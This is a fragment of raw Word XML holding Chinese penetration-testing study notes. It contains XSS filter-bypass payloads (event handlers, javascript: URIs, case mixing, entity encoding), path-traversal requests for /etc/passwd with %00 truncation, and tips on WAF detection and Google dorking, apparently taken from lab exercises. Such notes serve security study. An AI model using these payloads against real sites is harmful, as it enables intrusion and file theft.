          <w:t>//github.com/EnableSecurity/wafw00f</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p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af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Ekultek/WhatWaf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6" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
          </w:rPr>
          <w:t>//github.com/Ekultek/WhatWaf</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00F76936" w:rsidRPr="00F76936" w:rsidRDefault="00F76936" w:rsidP="00F76936"/>
    <w:p w:rsidR="00CB3A3A" w:rsidRPr="000D5101" w:rsidRDefault="000D5101" w:rsidP="00A14128">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r w:rsidRPr="000D5101">
        <w:t>XSS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB3A3A" w:rsidRPr="00CB3A3A" w:rsidRDefault="00CB3A3A" w:rsidP="00CB3A3A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"&gt;&lt;script&gt;alert('hack</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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')&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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/script&gt;&lt;"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB3A3A" w:rsidRDefault="00456CC1">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3：</w:t>
      </w:r>
      <w:r w:rsidR="00CB3A3A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5FA50EA2" wp14:editId="2ECAA20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8227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A4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>绕过&lt;</w:t>
      </w:r>
      <w:r w:rsidR="00A448A4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A448A4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB3A3A" w:rsidRDefault="00CB3A3A"/>
    <w:p w:rsidR="00CB3A3A" w:rsidRDefault="00C804F3">
      <w:r>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidR="00CB3A3A" w:rsidRPr="00CB3A3A">
        <w:t>onclick=</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="00CB3A3A" w:rsidRPr="00CB3A3A">
        <w:t>alert(/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CB3A3A" w:rsidRPr="00CB3A3A">
        <w:t>xss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CB3A3A" w:rsidRPr="00CB3A3A">
        <w:t>/)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB3A3A" w:rsidRDefault="00CB3A3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3812C0" wp14:editId="62FA78BB">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>309089</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4105275" cy="4953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F3">
        <w:t>‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CB3A3A">
        <w:t>onmouseover</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CB3A3A">
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidR="00C804F3">
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB3A3A">
        <w:t>alert(/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CB3A3A">
        <w:t>xss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CB3A3A">
        <w:t>/)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>鼠标</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>要碰才会</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>触发</w:t>
      </w:r>
      <w:r w:rsidR="00456CC1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（这种绕过主要是加多一个引号和绕过&lt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00456CC1" w:rsidRDefault="00456CC1"/>
    <w:p w:rsidR="00456CC1" w:rsidRDefault="00456CC1"/>
    <w:p w:rsidR="00456CC1" w:rsidRDefault="00456CC1"/>
    <w:p w:rsidR="00456CC1" w:rsidRDefault="00456CC1"/>
    <w:p w:rsidR="00456CC1" w:rsidRDefault="00456CC1">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00456CC1" w:rsidRDefault="00456CC1"/>
    <w:p w:rsidR="00456CC1" w:rsidRDefault="00456CC1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251665408" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="180B64B4" wp14:editId="7C6617CF">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>25532</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4391025" cy="3905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CC1" w:rsidRDefault="00456CC1"/>
    <w:p w:rsidR="00456CC1" w:rsidRDefault="00456CC1"/>
    <w:p w:rsidR="00456CC1" w:rsidRDefault="00456CC1"/>
    <w:p w:rsidR="00456CC1" w:rsidRDefault="00C804F3">
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB3A3A">
        <w:t>onclick</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CB3A3A">
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB3A3A">
        <w:t>alert</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CB3A3A">
        <w:t>(/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CB3A3A">
        <w:t>xss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CB3A3A">
        <w:t>/)</w:t>
      </w:r>
      <w:r w:rsidR="00456CC1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251663360" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="61E376C2" wp14:editId="081F5F6F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514850" cy="609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CC1" w:rsidRDefault="00456CC1"/>
    <w:p w:rsidR="00456CC1" w:rsidRDefault="00456CC1"/>
    <w:p w:rsidR="00C804F3" w:rsidRDefault="00C804F3"/>
    <w:p w:rsidR="00C804F3" w:rsidRDefault="00C804F3"/>
    <w:p w:rsidR="00C804F3" w:rsidRDefault="00C804F3"/>
    <w:p w:rsidR="00C804F3" w:rsidRDefault="00C804F3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>绕过了on和script</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C804F3" w:rsidRPr="00C804F3" w:rsidRDefault="00C804F3" w:rsidP="00C80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C804F3">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; &lt;a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C804F3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C804F3"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spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C804F3">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>javascript:alert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C804F3">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(1)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 w:rsidRPr="00C804F3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C804F3" w:rsidRDefault="00C804F3"/>
    <w:p w:rsidR="00C804F3" w:rsidRDefault="00A448A4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251667456" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="78DDCA5E" wp14:editId="25A644AE">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>24669</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4695825" cy="48577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4F3" w:rsidRDefault="00C804F3"/>
    <w:p w:rsidR="00A448A4" w:rsidRDefault="00A448A4"/>
    <w:p w:rsidR="00A448A4" w:rsidRDefault="00A448A4"/>
    <w:p w:rsidR="00A448A4" w:rsidRDefault="00A448A4">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>6：</w:t>
      </w:r>
      <w:r>
        <w:t>过滤了&lt;script、on、</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>、data、</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>href</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>标签</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A448A4" w:rsidRDefault="00A448A4">
      <w:r>
        <w:t>但是替换之前没有转化为小写字母，所以可以用大小写绕过</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A448A4" w:rsidRPr="00CB3A3A" w:rsidRDefault="00A448A4" w:rsidP="00A448A4">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB3A3A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>"&gt;&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SC</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB3A3A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>r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alert('hack</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CB3A3A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>')&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CB3A3A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CB3A3A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>CR</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB3A3A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>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&lt;"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A448A4" w:rsidRDefault="00A448A4"/>
    <w:p w:rsidR="00A448A4" w:rsidRDefault="00A448A4" w:rsidP="00A448A4">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>"&gt;&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>img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 xml:space="preserve">="1.jpg" </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>Onerror</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>="</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>1)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A448A4" w:rsidRDefault="00A448A4"/>
    <w:p w:rsidR="000D5101" w:rsidRDefault="000D5101"/>
    <w:p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7：</w:t>
      </w:r>
      <w:r w:rsidRPr="000D5101">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>过滤了script、on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、data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，并且在过滤前将keyword转换为了小写</w:t>
      </w:r>
    </w:p>
    <w:p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5101">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>第二处引用keyword没有编码，可以闭合input标签后，重写关键字绕过过滤</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D5101" w:rsidRDefault="000D5101" w:rsidP="000D5101">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>"&gt;&lt;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alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>1)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</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D5101" w:rsidRDefault="000D5101"/>
    <w:p w:rsidR="000D5101" w:rsidRDefault="000D5101"/>
    <w:p w:rsidR="000D5101" w:rsidRDefault="000D5101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8：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D5101" w:rsidRDefault="000D5101">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67300036">
            <wp:extent cx="5274310" cy="1677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01" w:rsidRDefault="000D5101" w:rsidP="000D5101">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>javascrip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>&amp;#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>116;:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>alert(1)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D5101" w:rsidRDefault="000D5101"/>
    <w:p w:rsidR="00D7298B" w:rsidRDefault="00D7298B"/>
    <w:p w:rsidR="0038154F" w:rsidRDefault="0038154F"/>
    <w:p w:rsidR="0038154F" w:rsidRDefault="0038154F"/>
    <w:p w:rsidR="0038154F" w:rsidRDefault="0038154F"/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拿出较为好用的payload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details/open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toggle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v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onload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im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script&gt;(alert)(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1)&lt;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/script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&gt;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ourceonerror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:alert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loadstart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aler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ahref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spellStart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:alert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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&gt;222&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0038154F" w:rsidRDefault="0038154F"/>
    <w:p w:rsidR="00D7298B" w:rsidRDefault="00D7298B"/>
    <w:p w:rsidR="00D7298B" w:rsidRDefault="00D7298B"/>
    <w:p w:rsidR="00D7298B" w:rsidRDefault="00D7298B" w:rsidP="00D7298B">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>任意文件下载</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D75791" w:rsidRDefault="00972178" w:rsidP="00D75791">
      <w:hyperlink r:id="rId63" w:history="1">
        <w:r w:rsidR="00D75791">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>https://www.cnblogs.com/zhaijiahui/p/8459661.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="002D6C60" w:rsidRDefault="00972178" w:rsidP="00D75791">
      <w:hyperlink r:id="rId64" w:history="1">
        <w:r w:rsidR="002D6C60">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>https://xz.aliyun.com/t/6594</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00D75791" w:rsidRDefault="00D75791" w:rsidP="00D75791"/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file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nam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lo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D75791"/>
    <w:p w:rsidR="00D7298B" w:rsidRDefault="00D7298B" w:rsidP="00D7298B">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Index.php?f</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>=../../../../../../../../</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D7298B" w:rsidRDefault="00D7298B" w:rsidP="00D7298B">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Index.php?f</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=../</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>index.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00D7298B" w:rsidRDefault="00D7298B" w:rsidP="00D7298B">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Index.php?f</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=file:///etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003719B2" w:rsidRDefault="003719B2" w:rsidP="00D7298B">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ath</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003719B2" w:rsidRPr="003719B2" w:rsidRDefault="003719B2" w:rsidP="00D7298B">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00D7298B" w:rsidRDefault="00D7298B" w:rsidP="00D7298B">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果自动加上后缀的话，用%00截断</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D7298B" w:rsidRDefault="00D7298B" w:rsidP="00D7298B">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>参数f的参数值为PHP文件时：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D7298B" w:rsidRDefault="00D7298B" w:rsidP="00D7298B">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>      1.文件被解析，则是文件包含漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D7298B" w:rsidRDefault="00D7298B" w:rsidP="00D7298B">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>      2.显示源代码，则是文件查看漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D7298B" w:rsidRDefault="00D7298B" w:rsidP="00D7298B">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>      3.提示下载，则是文件下载漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00907A06" w:rsidRDefault="00907A06" w:rsidP="00D7298B">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ing判断系统</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D7298B" w:rsidRDefault="00907A06" w:rsidP="00D7298B">
      <w:r>
        <w:t xml:space="preserve">UNIX 及类 UNIX </w:t>
      </w:r>
      <w:hyperlink r:id="rId65" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>操作系统</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> ICMP 回显应答的 TTL 字段值为 255</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Compaq Tru64 5.0 ICMP 回显应答的 TTL 字段值为 64</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">微软 </w:t>
      </w:r>
      <w:hyperlink r:id="rId66" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>Windows</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> NT/</w:t>
      </w:r>
      <w:hyperlink r:id="rId67" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>2K</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>操作系统 ICMP 回显应答的 TTL 字段值为 128</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">微软 Windows </w:t>
      </w:r>
      <w:hyperlink r:id="rId68" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>95</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> 操作系统 ICMP 回显应答的 TTL 字段值为 32</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001815CA" w:rsidRDefault="001815CA" w:rsidP="00D7298B"/>
    <w:p w:rsidR="001815CA" w:rsidRDefault="001815CA" w:rsidP="00D7298B"/>
    <w:p w:rsidR="001815CA" w:rsidRDefault="001815CA" w:rsidP="00D7298B">
      <w:r w:rsidRPr="00CA2DA4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Google</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2DA4">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2DA4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">搜索 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>site：</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>*.baidu</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>com</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>login</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00CA2DA4" w:rsidRDefault="00CA2DA4" w:rsidP="00D7298B"/>
    <w:p w:rsidR="003439C6" w:rsidRDefault="003439C6" w:rsidP="003439C6">
      <w:r w:rsidRPr="003439C6">
        <w:t>intitle</w:t>
      </w:r>
      <w:r w:rsidRPr="003439C6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：搜索网页标题中包含有特定字符的网页。例如输入“</w:t>
      </w:r>
      <w:r w:rsidRPr="003439C6">
